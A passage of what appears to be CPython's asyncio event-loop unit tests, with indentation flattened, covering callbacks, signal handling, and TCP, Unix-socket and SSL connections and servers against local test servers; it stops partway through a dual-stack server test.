import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
